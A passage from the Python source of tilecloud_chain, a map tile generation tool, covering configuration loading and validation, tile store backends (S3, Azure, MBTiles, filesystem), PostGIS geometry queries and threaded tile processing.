os.environ[\"GUNICORN_LOG_LEVEL\"]},\n # \"level = INFO\" logs SQL queries.\n # \"level = DEBUG\" logs SQL queries and results.\n # \"level = WARN\" logs neither. (Recommended for production systems.)\n \"sqlalchemy.engine\": {\"level\": os.environ[\"SQL_LOG_LEVEL\"]},\n \"c2cwsgiutils\": {\"level\": os.environ[\"C2CWSGIUTILS_LOG_LEVEL\"]},\n \"tilecloud\": {\"level\": os.environ[\"TILECLOUD_LOG_LEVEL\"]},\n \"tilecloud_chain\": {\"level\": os.environ[\"TILECLOUD_CHAIN_LOG_LEVEL\"]},\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"json\": {\n \"class\": \"c2cwsgiutils.pyramid_logging.JsonLogHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n },\n \"formatters\": {\n \"generic\": {\n \"format\": \"%(asctime)s [%(process)d] [%(levelname)-5.5s] %(message)s\",\n \"datefmt\": \"[%Y-%m-%d %H:%M:%S %z]\",\n \"class\": \"logging.Formatter\",\n }\n },\n }\n )\n sentry.includeme()\n\n assert \"generation\" in self.get_main_config().config, self.get_main_config().config\n\n error = False\n if self.options is not None and self.options.zoom is not None:\n error_message = (\n f\"The zoom argument '{self.options.zoom}' has incorrect format, \"\n \"it can be a single value, a range (3-9), a list of values (2,5,7).\"\n )\n if self.options.zoom.find(\"-\") >= 0:\n splitted_zoom: List[str] = self.options.zoom.split(\"-\")\n if len(splitted_zoom) != 2:\n _LOGGER.error(error_message)\n error = True\n try:\n self.options.zoom = range(int(splitted_zoom[0]), int(splitted_zoom[1]) + 1)\n except ValueError:\n _LOGGER.exception(error_message)\n error = True\n elif self.options.zoom.find(\",\") >= 0:\n try:\n self.options.zoom = [int(z) for z in self.options.zoom.split(\",\")]\n except ValueError:\n _LOGGER.exception(error_message)\n error = True\n else:\n try:\n self.options.zoom = [int(self.options.zoom)]\n except ValueError:\n _LOGGER.exception(error_message)\n error = True\n\n if error:\n sys.exit(1)\n\n if layer_name and self.config_file:\n assert layer_name is not None\n self.create_log_tiles_error(layer_name)\n\n def get_host_config_file(self, host: Optional[str]) -> Optional[str]:\n \"\"\"Get the configuration file name for the given host.\"\"\"\n if self.config_file:\n return self.config_file\n assert host\n if host not in self.get_hosts():\n _LOGGER.error(\"Missing host '%s' in global config\", host)\n return None\n config_file = self.get_hosts().get(host, os.environ.get(\"TILEGENERATION_CONFIGFILE\"))\n _LOGGER.debug(\"For the host %s, use config file: %s\", host, config_file)\n return config_file\n\n def get_host_config(self, host: Optional[str]) -> DatedConfig:\n \"\"\"Get the configuration for the given host.\"\"\"\n config_file = self.get_host_config_file(host)\n if not config_file:\n _LOGGER.error(\"No config file for host %s\", host)\n return (\n self.get_config(config_file)\n if config_file\n else DatedConfig(cast(tilecloud_chain.configuration.Configuration, {}), 0, \"\")\n )\n\n def get_tile_config(self, tile: Tile) -> DatedConfig:\n return self.get_config(tile.metadata[\"config_file\"])\n\n def get_config(\n self,\n config_file: str,\n ignore_error: bool = True,\n base_config: Optional[tilecloud_chain.configuration.Configuration] = None,\n ) -> DatedConfig:\n \"\"\"Get the validated configuration for the file name, with cache management.\"\"\"\n assert config_file\n config_path = pathlib.Path(config_file)\n if not config_path.exists():\n _LOGGER.error(\"Missing config file %s\", config_file)\n if ignore_error:\n return DatedConfig(cast(tilecloud_chain.configuration.Configuration, {}), 0, \"\")\n else:\n sys.exit(1)\n\n config: Optional[DatedConfig] = self.configs.get(config_file)\n if config is not None and config.mtime == config_path.stat().st_mtime:\n return config\n\n config, success = self._get_config(config_file, ignore_error, base_config)\n if not success or config is None:\n if ignore_error:\n config = DatedConfig(cast(tilecloud_chain.configuration.Configuration, {}), 0, \"\")\n else:\n sys.exit(1)\n self.configs[config_file] = config\n return config\n\n def get_main_config(self) -> DatedConfig:\n if \"TILEGENERATION_MAIN_CONFIGFILE\" in os.environ and os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"]:\n return self.get_config(os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"], False)\n elif self.config_file:\n return self.get_config(self.config_file, self.options.ignore_error, self.base_config)\n else:\n _LOGGER.error(\"No provided configuration file\")\n return DatedConfig({}, 0, \"\")\n\n def get_hosts(self, silent: bool = False) -> Dict[str, str]:\n file_path = pathlib.Path(os.environ[\"TILEGENERATION_HOSTSFILE\"])\n if not file_path.exists():\n if not silent:\n _LOGGER.error(\"Missing hosts file %s\", file_path)\n return {}\n\n if self.hosts_cache is not None and self.hosts_cache.mtime == file_path.stat().st_mtime:\n return self.hosts_cache.hosts\n\n with file_path.open(encoding=\"utf-8\") as hosts_file:\n ruamel = YAML(typ=\"safe\")\n hosts = {}\n hosts_raw = ruamel.load(hosts_file)\n if \"sources\" in hosts_raw:\n for key, value in hosts_raw[\"sources\"].items():\n if isinstance(value, str):\n hosts[key] = value\n else:\n hosts.update(value)\n else:\n hosts = hosts_raw\n\n self.hosts_cache = DatedHosts(hosts, file_path.stat().st_mtime)\n return hosts\n\n def _get_config(\n self,\n config_file: str,\n ignore_error: bool,\n base_config: Optional[tilecloud_chain.configuration.Configuration] = None,\n ) -> Tuple[DatedConfig, bool]:\n \"\"\"Get the validated configuration for the file name.\"\"\"\n with open(config_file, encoding=\"utf-8\") as f:\n config: Dict[str, Any] = {}\n config.update({} if base_config is None else base_config)\n ruamel = YAML()\n config.update(ruamel.load(f))\n\n dated_config = DatedConfig(\n cast(tilecloud_chain.configuration.Configuration, config),\n pathlib.Path(config_file).stat().st_mtime,\n config_file,\n )\n success = self.validate_config(dated_config, ignore_error)\n return dated_config, success\n\n def validate_config(self, config: DatedConfig, ignore_error: bool) -> bool:\n \"\"\"Validate the configuration.\"\"\"\n # Generate base structure\n if \"defaults\" in config.config:\n del config.config[\"defaults\"]\n if \"generation\" not in config.config:\n config.config[\"generation\"] = {}\n if \"cost\" in config.config:\n if \"s3\" not in config.config[\"cost\"]:\n config.config[\"cost\"][\"s3\"] = {}\n if \"cloudfront\" not in config.config[\"cost\"]:\n config.config[\"cost\"][\"cloudfront\"] = {}\n if \"sqs\" not in config.config[\"cost\"]:\n config.config[\"cost\"][\"sqs\"] = {}\n\n schema_data = pkgutil.get_data(\"tilecloud_chain\", \"schema.json\")\n assert schema_data\n errors, _ = jsonschema_validator.validate(\n config.file, cast(Dict[str, Any], config.config), json.loads(schema_data), default=True\n )\n\n if errors:\n _LOGGER.error(\"The config file is invalid:\\n%s\", \"\\n\".join(errors))\n if not (\n ignore_error\n or os.environ.get(\"TILEGENERATION_IGNORE_CONFIG_ERROR\", \"FALSE\").lower() == \"true\"\n ):\n sys.exit(1)\n\n error = False\n grids = config.config.get(\"grids\", {})\n for grid in grids.values():\n if \"resolution_scale\" in grid:\n scale = grid[\"resolution_scale\"]\n for resolution in grid[\"resolutions\"]:\n if resolution * scale % 1 != 0.0:\n _LOGGER.error(\n \"The resolution %s * resolution_scale %s is not an integer.\", resolution, scale\n )\n error = True\n else:\n grid[\"resolution_scale\"] = self._resolution_scale(grid[\"resolutions\"])\n\n srs = int(grid[\"srs\"].split(\":\")[1])\n if \"proj4_literal\" not in grid:\n if srs == 3857:\n grid[\"proj4_literal\"] = (\n \"+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 \"\n \"+x_0=0.0 +y_0=0.0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs +over\"\n )\n elif srs == 21781:\n grid[\"proj4_literal\"] = (\n \"+proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 \"\n \"+x_0=600000 +y_0=200000 +ellps=bessel +towgs84=674.374,15.056,405.346,0,0,0,0 \"\n \"+units=m +no_defs\"\n )\n elif srs == 2056:\n grid[\"proj4_literal\"] = (\n \"+proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 \"\n \"+x_0=2600000 +y_0=1200000 +ellps=bessel +towgs84=674.374,15.056,405.346,0,0,0,0 \"\n \"+units=m +no_defs\"\n )\n else:\n grid[\"proj4_literal\"] = f\"+init={grid['srs']}\"\n\n layers = config.config.get(\"layers\", {})\n for lname, layer in sorted(layers.items()):\n if \"headers\" not in layer and layer[\"type\"] == \"wms\":\n layer[\"headers\"] = {\n \"Cache-Control\": \"no-cache, no-store\",\n \"Pragma\": \"no-cache\",\n }\n if layer[\"type\"] == \"mapnik\" and layer.get(\"output_format\", \"png\") == \"grid\" and layer[\"meta\"]:\n _LOGGER.error(\"The layer '%s' is of type Mapnik/Grid, that can't support matatiles.\", lname)\n error = True\n\n if error:\n if not (\n ignore_error\n or os.environ.get(\"TILEGENERATION_IGNORE_CONFIG_ERROR\", \"FALSE\").lower() == \"true\"\n ):\n sys.exit(1)\n\n return not (error or errors)\n\n def init(self, queue_store: Optional[TileStore] = None, daemon: bool = False) -> None:\n self.queue_store = queue_store\n self.daemon = daemon\n\n @staticmethod\n def _primefactors(x: int) -> List[int]:\n factorlist = []\n loop = 2\n while loop <= x:\n if x % loop == 0:\n x = round(x / loop)\n factorlist.append(loop)\n else:\n loop += 1\n return factorlist\n\n def _resolution_scale(self, resolutions: Union[List[float], List[int]]) -> int:\n prime_fact = {}\n for resolution in resolutions:\n denominator = Fraction(str(resolution)).denominator\n prime_factors = self._primefactors(denominator)\n for factor in set(prime_factors):\n if factor not in prime_fact:\n prime_fact[factor] = 0\n\n prime_fact[factor] = max(prime_fact[factor], len([f for f in prime_factors if f == factor]))\n\n result = 1\n for fact, nb in prime_fact.items():\n result *= fact**nb\n return result\n\n def get_all_dimensions(self, layer: tilecloud_chain.configuration.Layer) -> List[Dict[str, str]]:\n assert layer is not None\n\n options_dimensions = {}\n for opt_dim in self.options.dimensions:\n opt_dim = opt_dim.split(\"=\")\n if len(opt_dim) != 2:\n sys.exit(\"the DIMENSIONS option should be like this DATE=2013 VERSION=13.\")\n options_dimensions[opt_dim[0]] = opt_dim[1]\n\n all_dimensions = [\n [(dim[\"name\"], d) for d in dim[\"generate\"]]\n for dim in layer.get(\"dimensions\", [])\n if dim[\"name\"] not in options_dimensions\n ]\n all_dimensions += [[p] for p in options_dimensions.items()]\n return [{}] if len(all_dimensions) == 0 else [dict(d) for d in product(*all_dimensions)]\n\n def get_store(\n self,\n config: DatedConfig,\n cache: tilecloud_chain.configuration.Cache,\n layer_name: str,\n read_only: bool = False,\n ) -> TileStore:\n layer = config.config[\"layers\"][layer_name]\n grid = config.config[\"grids\"][layer[\"grid\"]]\n layout = WMTSTileLayout(\n layer=layer_name,\n url=cache[\"folder\"],\n style=layer[\"wmts_style\"],\n format=\".\" + layer[\"extension\"],\n dimensions_name=[dimension[\"name\"] for dimension in layer.get(\"dimensions\", [])],\n tile_matrix_set=layer[\"grid\"],\n tile_matrix=lambda z: get_tile_matrix_identifier(grid, zoom=z),\n request_encoding=\"REST\",\n )\n # store\n if cache[\"type\"] == \"s3\":\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n # on s3\n cache_tilestore: TileStore = S3TileStore(\n cache_s3[\"bucket\"],\n layout,\n s3_host=cache.get(\"host\", \"s3-eu-west-1.amazonaws.com\"),\n cache_control=cache.get(\"cache_control\"),\n )\n elif cache[\"type\"] == \"azure\":\n cache_azure = cast(tilecloud_chain.configuration.CacheAzureTyped, cache)\n # on Azure\n cache_tilestore = AzureStorageBlobTileStore(\n container=cache_azure[\"container\"],\n tilelayout=layout,\n cache_control=cache_azure.get(\"cache_control\"),\n )\n elif cache[\"type\"] == \"mbtiles\":\n metadata = {}\n for dimension in layer[\"dimensions\"]:\n metadata[\"dimension_\" + dimension[\"name\"]] = dimension[\"default\"]\n # on mbtiles file\n filename = (\n layout.filename(TileCoord(0, 0, 0), metadata=metadata).replace(\"/0/0/0\", \"\") + \".mbtiles\"\n )\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n cache_tilestore = MBTilesTileStore(\n sqlite3.connect(filename),\n content_type=layer[\"mime_type\"],\n tilecoord_in_topleft=True,\n )\n elif cache[\"type\"] == \"bsddb\":\n metadata = {}\n for dimension in layer[\"dimensions\"]:\n metadata[\"dimension_\" + dimension[\"name\"]] = dimension[\"default\"]\n import bsddb3 as bsddb # pylint: disable=import-outside-toplevel,import-error\n\n from tilecloud.store.bsddb import BSDDBTileStore # pylint: disable=import-outside-toplevel\n\n # on bsddb file\n filename = layout.filename(TileCoord(0, 0, 0), metadata=metadata).replace(\"/0/0/0\", \"\") + \".bsddb\"\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n db = bsddb.hashopen(\n filename,\n # and os.path.exists(filename) to avoid error on non existing file\n \"r\" if read_only and os.path.exists(filename) else \"c\",\n )\n\n self._close_actions.append(Close(db))\n\n cache_tilestore = BSDDBTileStore(\n db,\n content_type=layer[\"mime_type\"],\n )\n elif cache[\"type\"] == \"filesystem\":\n # on filesystem\n cache_tilestore = FilesystemTileStore(\n layout,\n content_type=layer[\"mime_type\"],\n )\n else:\n sys.exit(\"unknown cache type: \" + cache[\"type\"])\n\n return cache_tilestore\n\n @staticmethod\n def get_grid_name(\n config: DatedConfig, layer: tilecloud_chain.configuration.Layer, name: Optional[Any] = None\n ) -> tilecloud_chain.configuration.Grid:\n if name is None:\n name = layer[\"grid\"]\n\n return config.config[\"grids\"][name]\n\n def get_tilesstore(self, cache: Optional[str] = None) -> TimedTileStoreWrapper:\n gene = self\n\n def get_store(config_file: str, layer_name: str) -> TileStore:\n config = gene.get_config(config_file)\n cache_name = cache or config.config[\"generation\"][\"default_cache\"]\n cache_obj = config.config[\"caches\"][cache_name]\n return self.get_store(config, cache_obj, layer_name)\n\n cache_tilestore = TimedTileStoreWrapper(\n MultiTileStore(get_store),\n store_name=\"store\",\n )\n return cache_tilestore\n\n def add_geom_filter(self) -> None:\n self.imap(IntersectGeometryFilter(gene=self), \"Intersect with geom\")\n\n def add_logger(self) -> None:\n if (\n not self.options.quiet\n and not self.options.verbose\n and not self.options.debug\n and os.environ.get(\"FRONTEND\") != \"noninteractive\"\n ):\n\n def log_tiles(tile: Tile) -> Tile:\n sys.stdout.write(f\"{tile.tilecoord} {tile.formated_metadata} \\r\")\n sys.stdout.flush()\n return tile\n\n self.imap(log_tiles)\n elif not self.options.quiet and getattr(self.options, \"role\", None) != \"server\":\n self.imap(Logger(_LOGGER, logging.INFO, \"%(tilecoord)s, %(formated_metadata)s\"))\n\n def add_metatile_splitter(self, store: Optional[TileStore] = None) -> None:\n assert self.functions != self.functions_tiles, \"add_metatile_splitter should not be called twice\"\n if store is None:\n gene = self\n\n def get_splitter(config_file: str, layer_name: str) -> Optional[MetaTileSplitterTileStore]:\n config = gene.get_config(config_file)\n layer = config.config[\"layers\"][layer_name]\n if layer.get(\"meta\"):\n return MetaTileSplitterTileStore(\n layer[\"mime_type\"],\n config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"],\n layer[\"meta_buffer\"],\n )\n return None\n\n store = TimedTileStoreWrapper(MultiTileStore(get_splitter), store_name=\"splitter\")\n\n run = Run(self, self.functions_tiles)\n nb_thread = int(os.environ.get(\"TILE_NB_THREAD\", \"1\"))\n if nb_thread == 1 or not self.multi_thread:\n\n def meta_get(metatile: Tile) -> Tile:\n assert store is not None\n substream = store.get((metatile,))\n\n if getattr(self.options, \"role\", \"\") == \"hash\":\n tile = next(substream)\n assert tile is not None\n run(tile)\n else:\n for tile in substream:\n assert tile is not None\n tile.metadata.update(metatile.metadata)\n run(tile)\n with self.error_lock:\n self.error += run.error\n return metatile\n\n else:\n\n def meta_get(metatile: Tile) -> Tile:\n assert store is not None\n if self.metatilesplitter_thread_pool is None:\n self.metatilesplitter_thread_pool = ThreadPoolExecutor(nb_thread)\n\n substream = store.get((metatile,))\n\n for _ in self.metatilesplitter_thread_pool.map(\n run, substream, chunksize=int(os.environ.get(\"TILE_CHUNK_SIZE\", \"1\"))\n ):\n pass\n\n with self.error_lock:\n self.error += run.error\n return metatile\n\n self.imap(meta_get)\n self.functions = self.functions_tiles\n\n def create_log_tiles_error(self, layer: str) -> Optional[TextIO]:\n if \"error_file\" in self.get_main_config().config.get(\"generation\", {}):\n now = datetime.now()\n time_ = now.strftime(\"%d-%m-%Y %H:%M:%S\")\n error_file = open( # pylint: disable=consider-using-with\n self.get_main_config().config[\"generation\"][\"error_file\"].format(layer=layer, datetime=now),\n \"a\",\n encoding=\"utf-8\",\n )\n error_file.write(f\"# [{time_}] Start the layer '{layer}' generation\\n\")\n self.error_files_[layer] = error_file\n return error_file\n return None\n\n def close(self) -> None:\n for file_ in self.error_files_.values():\n file_.close()\n\n def get_log_tiles_error_file(self, layer: str) -> Optional[TextIO]:\n return self.error_files_[layer] if layer in self.error_files_ else self.create_log_tiles_error(layer)\n\n def log_tiles_error(self, tile: Optional[Tile] = None, message: Optional[str] = None) -> None:\n if tile is None:\n return\n config = self.get_tile_config(tile)\n if \"error_file\" in config.config[\"generation\"]:\n assert tile is not None\n\n time_ = datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n if self.get_log_tiles_error_file(tile.metadata[\"layer\"]) is None:\n raise MissingErrorFileException(\"Missing error file\")\n\n tilecoord = \"\" if tile.tilecoord is None else f\"{tile.tilecoord} {tile.formated_metadata} \"\n message = \"\" if message is None else f\" {message}\"\n\n io = self.get_log_tiles_error_file(tile.metadata[\"layer\"])\n assert io is not None\n out_message = message.replace(\"\\n\", \" \")\n io.write(f\"{tilecoord}# [{time_}]{out_message}\\n\")\n\n def get_grid(self, config: DatedConfig, grid_name: str) -> TileGrid:\n dated_grid = self.grid_cache.get(config.file, {}).get(grid_name)\n if dated_grid is not None and config.mtime == dated_grid.mtime:\n return dated_grid.grid\n\n grid = config.config[\"grids\"][grid_name]\n scale = grid[\"resolution_scale\"]\n\n tilegrid = FreeTileGrid(\n resolutions=cast(List[int], [r * scale for r in grid[\"resolutions\"]]),\n scale=scale,\n max_extent=cast(Tuple[int, int, int, int], grid[\"bbox\"]),\n tile_size=grid[\"tile_size\"],\n )\n\n self.grid_cache.setdefault(config.file, {})[grid_name] = DatedTileGrid(tilegrid, config.mtime)\n return tilegrid\n\n def get_geoms(\n self, config: DatedConfig, layer_name: str, host: Optional[str] = None\n ) -> Dict[Union[str, int], BaseGeometry]:\n dated_geoms = self.geoms_cache.get(config.file, {}).get(layer_name)\n if dated_geoms is not None and config.mtime == dated_geoms.mtime:\n return dated_geoms.geoms\n\n layer = config.config[\"layers\"][layer_name]\n\n if self.options.near is not None or (\n self.options.time is not None and \"bbox\" in layer and self.options.zoom is not None\n ):\n if self.options.zoom is None or len(self.options.zoom) != 1:\n sys.exit(\"Option --near needs the option --zoom with one value.\")\n if not (self.options.time is not None or self.options.test is not None):\n sys.exit(\"Option --near needs the option --time or --test.\")\n position = (\n self.options.near\n if self.options.near is not None\n else [(layer[\"bbox\"][0] + layer[\"bbox\"][2]) / 2, (layer[\"bbox\"][1] + layer[\"bbox\"][3]) / 2]\n )\n bbox = config.config[\"grids\"][layer[\"grid\"]][\"bbox\"]\n diff = [position[0] - bbox[0], position[1] - bbox[1]]\n resolution = config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"][self.options.zoom[0]]\n mt_to_m = layer[\"meta_size\"] * config.config[\"grids\"][layer[\"grid\"]][\"tile_size\"] * resolution\n mt = [float(d) / mt_to_m for d in diff]\n\n nb_tile = self.options.time * 3 if self.options.time is not None else self.options.test\n nb_mt = nb_tile / (layer[\"meta_size\"] ** 2)\n nb_sqrt_mt = ceil(sqrt(nb_mt))\n\n mt_origin = [round(m - nb_sqrt_mt / 2) for m in mt]\n extent = [\n bbox[0] + mt_origin[0] * mt_to_m,\n bbox[1] + mt_origin[1] * mt_to_m,\n bbox[0] + (mt_origin[0] + nb_sqrt_mt) * mt_to_m,\n bbox[1] + (mt_origin[1] + nb_sqrt_mt) * mt_to_m,\n ]\n elif self.options.bbox is not None:\n extent = self.options.bbox\n elif \"bbox\" in layer:\n extent = layer[\"bbox\"]\n else:\n extent = config.config[\"grids\"][layer[\"grid\"]][\"bbox\"]\n\n geoms: Dict[Union[str, int], BaseGeometry] = {}\n if extent:\n geom = Polygon(\n (\n (extent[0], extent[1]),\n (extent[0], extent[3]),\n (extent[2], extent[3]),\n (extent[2], extent[1]),\n )\n )\n for z, r in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n geoms[z] = geom\n\n if self.options.near is None and self.options.geom:\n for g in layer.get(\"geoms\", []):\n with _GEOMS_GET_SUMMARY.labels(layer_name, host if host else self.options.host).time():\n connection = psycopg2.connect(g[\"connection\"])\n cursor = connection.cursor()\n sql = f\"SELECT ST_AsBinary(geom) FROM (SELECT {g['sql']}) AS g\" # nosec\n _LOGGER.info(\"Execute SQL: %s.\", sql)\n cursor.execute(sql)\n geom_list = [loads_wkb(bytes(r[0])) for r in cursor.fetchall()]\n geom = unary_union(geom_list)\n if extent:\n geom = geom.intersection(\n Polygon(\n (\n (extent[0], extent[1]),\n (extent[0], extent[3]),\n (extent[2], extent[3]),\n (extent[2], extent[1]),\n )\n )\n )\n for z, r in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n if (\"min_resolution\" not in g or g[\"min_resolution\"] <= r) and (\n \"max_resolution\" not in g or g[\"max_resolution\"] >= r\n ):\n geoms[z] = geom\n cursor.close()\n connection.close()\n\n self.geoms_cache.setdefault(config.file, {})[layer_name] = DatedGeoms(geoms, config.mtime)\n return geoms\n\n def init_tilecoords(self, config: DatedConfig, layer_name: str) -> None:\n layer = config.config[\"layers\"][layer_name]\n resolutions = config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]\n\n if self.options.time is not None and self.options.zoom is None:\n if \"min_resolution_seed\" in layer:\n self.options.zoom = [resolutions.index(layer[\"min_resolution_seed\"])]\n else:\n self.options.zoom = [len(resolutions) - 1]\n\n if self.options.zoom is not None:\n zoom_max = len(resolutions) - 1\n for zoom in self.options.zoom:\n if zoom > zoom_max:\n _LOGGER.warning(\n \"zoom %i is greater than the maximum zoom %i of grid %s of layer %s, ignored.\",\n zoom,\n zoom_max,\n layer[\"grid\"],\n layer_name,\n )\n self.options.zoom = [z for z in self.options.zoom if z <= zoom_max]\n\n if \"min_resolution_seed\" in layer:\n if self.options.zoom is None:\n self.options.zoom = []\n for z, resolution in enumerate(resolutions):\n if resolution >= layer[\"min_resolution_seed\"]:\n self.options.zoom.append(z)\n else:\n for zoom in self.options.zoom:\n resolution = resolutions[zoom]\n if resolution < layer[\"min_resolution_seed\"]:\n _LOGGER.warning(\n \"zoom %i corresponds to resolution %s is smaller\"\n \" than the 'min_resolution_seed' %s of layer %s, ignored.\",\n zoom,\n resolution,\n layer[\"min_resolution_seed\"],\n layer_name,\n )\n self.options.zoom = [\n z for z in self.options.zoom if resolutions[z] >= layer[\"min_resolution_seed\"]\n ]\n\n if self.options.zoom is None:\n self.options.zoom = [z for z, r in enumerate(resolutions)]\n\n # Fill the bounding pyramid\n tilegrid = self.get_grid(config, layer[\"grid\"])\n bounding_pyramid = BoundingPyramid(tilegrid=tilegrid)\n geoms = self.get_geoms(config, layer_name)\n for zoom in self.options.zoom:\n if zoom in geoms:\n extent = geoms[zoom].bounds\n\n if len([e for e in extent if not math.isnan(e)]) == 0:\n _LOGGER.warning(\"bounds empty for zoom %s\", zoom)\n else:\n minx, miny, maxx, maxy = extent\n px_buffer = layer[\"px_buffer\"]\n m_buffer = px_buffer * resolutions[zoom]\n minx -= m_buffer\n miny -= m_buffer\n maxx += m_buffer\n maxy += m_buffer\n bounding_pyramid.add(\n tilegrid.tilecoord(\n zoom,\n max(minx, tilegrid.max_extent[0]),\n max(miny, tilegrid.max_extent[1]),\n )\n )\n bounding_pyramid.add(\n tilegrid.tilecoord(\n zoom,\n min(maxx, tilegrid.max_extent[2]),\n min(maxy, tilegrid.max_extent[3]),\n )\n )\n\n if layer[\"meta\"]:\n self.set_tilecoords(config, bounding_pyramid.metatilecoords(layer[\"meta_size\"]), layer_name)\n else:\n self.set_tilecoords(config, bounding_pyramid, layer_name)\n\n @staticmethod\n def _tilestream(\n tilecoords: Iterable[TileCoord],\n default_metadata: Dict[str, str],\n all_dimensions: List[Dict[str, str]],\n ) -> Iterator[Tile]:\n for tilecoord in tilecoords:\n for dimensions in all_dimensions:\n metadata = {}\n if default_metadata is not None:\n metadata.update(default_metadata)\n for k, v in dimensions.items():\n metadata[\"dimension_\" + k] = v\n yield Tile(tilecoord, metadata=metadata)\n\n def set_tilecoords(self, config: DatedConfig, tilecoords: Iterable[TileCoord], layer_name: str) -> None:\n assert tilecoords is not None\n layer = config.config[\"layers\"][layer_name]\n\n metadata = {\"layer\": layer_name, \"config_file\": config.file}\n if self.options.host is not None:\n metadata[\"host\"] = self.options.host\n self.tilestream = self._tilestream(tilecoords, metadata, self.get_all_dimensions(layer))\n\n def set_store(self, store: TileStore) -> None:\n self.tilestream = cast(Iterator[Tile], store.list())\n\n def counter(self) -> \"Count\":\n count = Count()\n self.imap(count)\n return count\n\n def counter_size(self) -> \"CountSize\":\n count = CountSize()\n self.imap(count)\n return count\n\n def process(self, name: Optional[str] = None, key: str = \"post_process\") -> None:\n gene = self\n\n def get_process(config_file: str, layer_name: str) -> Optional[Process]:\n config = gene.get_config(config_file)\n layer = config.config[\"layers\"][layer_name]\n name_ = name\n if name_ is None:\n name_ = layer.get(key) # type: ignore\n if name_ is not None:\n return Process(config.config[\"process\"][name_], self.options)\n return None\n\n self.imap(MultiAction(get_process))\n\n def get(self, store: TileStore, time_message: Optional[str] = None) -> None:\n assert store is not None\n self.imap(store.get_one, time_message)\n\n def put(self, store: TileStore, time_message: Optional[str] = None) -> None:\n assert store is not None\n\n def put_internal(tile: Tile) -> Tile:\n store.put_one(tile)\n return tile\n\n self.imap(put_internal, time_message)\n\n def delete(self, store: TileStore, time_message: Optional[str] = None) -> None:\n assert store is not None\n\n def delete_internal(tile: Tile) -> Tile:\n store.delete_one(tile)\n return tile\n\n self.imap(delete_internal, time_message)\n\n def imap(self, func: Any, time_message: Optional[str] = None) -> None:\n assert func is not None\n\n class Func:\n \"\"\"Function with an additional field used to names it in timing messages.\"\"\"\n\n def __init__(self, func: Callable[[Tile], Tile], time_message: Optional[str]) -> None:\n self.func = func\n self.time_message = time_message\n\n def __call__(self, tile: Tile) -> Tile:\n return self.func(tile)\n\n def __str__(self) -> str:\n return f\"Func: {self.func}\"\n\n self.functions.append(Func(func, time_message))\n\n def consume(self, test: Optional[int] = None) -> None:\n assert self.tilestream is not None\n\n test = self.options.test if test is None else test\n\n start = datetime.now()\n\n run = Run(self, self.functions_metatiles)\n\n if test is None:\n if TYPE_CHECKING:\n buffer: queue.Queue[Tile] = queue.Queue(int(os.environ.get(\"TILE_QUEUE_SIZE\", \"2\")))\n else:\n buffer = queue.Queue(int(os.environ.get(\"TILE_QUEUE_SIZE\", \"2\")))\n end = False\n\n nb_thread = int(os.environ.get(\"METATILE_NB_THREAD\", \"1\"))\n\n if nb_thread == 1 or not self.multi_thread:\n consume(map(run, self.tilestream), None)\n else:\n should_exit_error = False\n\n def target() -> None:\n _LOGGER.debug(\"Start run\")\n nonlocal should_exit_error\n while not end or not buffer.empty():\n try:\n run(buffer.get(timeout=1))\n except tilecloud.filter.error.TooManyErrors:\n _LOGGER.exception(\"Too many errors\")\n should_exit_error = True\n except queue.Empty:\n pass\n _LOGGER.debug(\"End run\")\n\n threads = [threading.Thread(target=target, name=f\"Run {i}\") for i in range(nb_thread)]\n for thread in threads:\n thread.start()\n\n for tile in self.tilestream:\n while True:\n try:\n buffer.put(tile, timeout=1)\n break\n except queue.Full:\n if should_exit_error:\n sys.exit(1)\n\n end = True\n\n for thread in threads:\n thread.join(30)\n\n if self.metatilesplitter_thread_pool is not None:\n self.metatilesplitter_thread_pool.shutdown()\n self.metatilesplitter_thread_pool = None\n\n assert buffer.empty(), buffer.qsize()\n\n else:\n for _ in range(test):\n run(next(self.tilestream))\n\n if self.metatilesplitter_thread_pool is not None:\n self.metatilesplitter_thread_pool.shutdown()\n self.metatilesplitter_thread_pool = None\n\n assert threading.active_count() == 1, \", \".join([str(t) for t in threading.enumerate()])\n\n self.error += run.error\n self.duration = datetime.now() - start\n for ca in self._close_actions:\n ca()\n\n\nclass Count:\n \"\"\"Count the number of generated tile.\"\"\"\n\n def __init__(self) -> None:\n self.nb = 0\n self.lock = threading.Lock()\n\n def __call__(self, tile: Optional[Tile] = None) -> Optional[Tile]:\n with self.lock:\n self.nb += 1\n return tile\n\n\nclass CountSize:\n \"\"\"Count the number of generated tile and measure the total generated size.\"\"\"\n\n def __init__(self) -> None:\n self.nb = 0\n self.size = 0\n self.lock = threading.Lock()\n\n def __call__(self, tile: Optional[Tile] = None) -> Optional[Tile]:\n if tile and tile.data:\n with self.lock:\n self.nb += 1\n self.size += len(tile.data)\n return tile\n\n\nclass HashDropper:\n \"\"\"\n Create a filter to remove the tiles data where they have the specified size and hash.\n\n Used to drop the empty tiles.\n\n The ``store`` is used to delete the empty tiles.\n \"\"\"\n\n def __init__(\n self,\n size: int,\n sha1code: str,\n store: Optional[TileStore] = None,\n queue_store: Optional[TileStore] = None,\n count: Optional[Count] = None,\n ) -> None:\n self.size = size\n self.sha1code = sha1code\n self.store = store\n self.queue_store = queue_store\n self.count = count\n\n def __call__(self, tile: Tile) -> Optional[Tile]:\n assert tile.data\n if len(tile.data) != self.size or sha1(tile.data).hexdigest() != self.sha1code: # nosec\n return tile\n else:\n if self.store is not None:\n if tile.tilecoord.n != 1:\n for tilecoord in tile.tilecoord:\n self.store.delete_one(Tile(tilecoord, 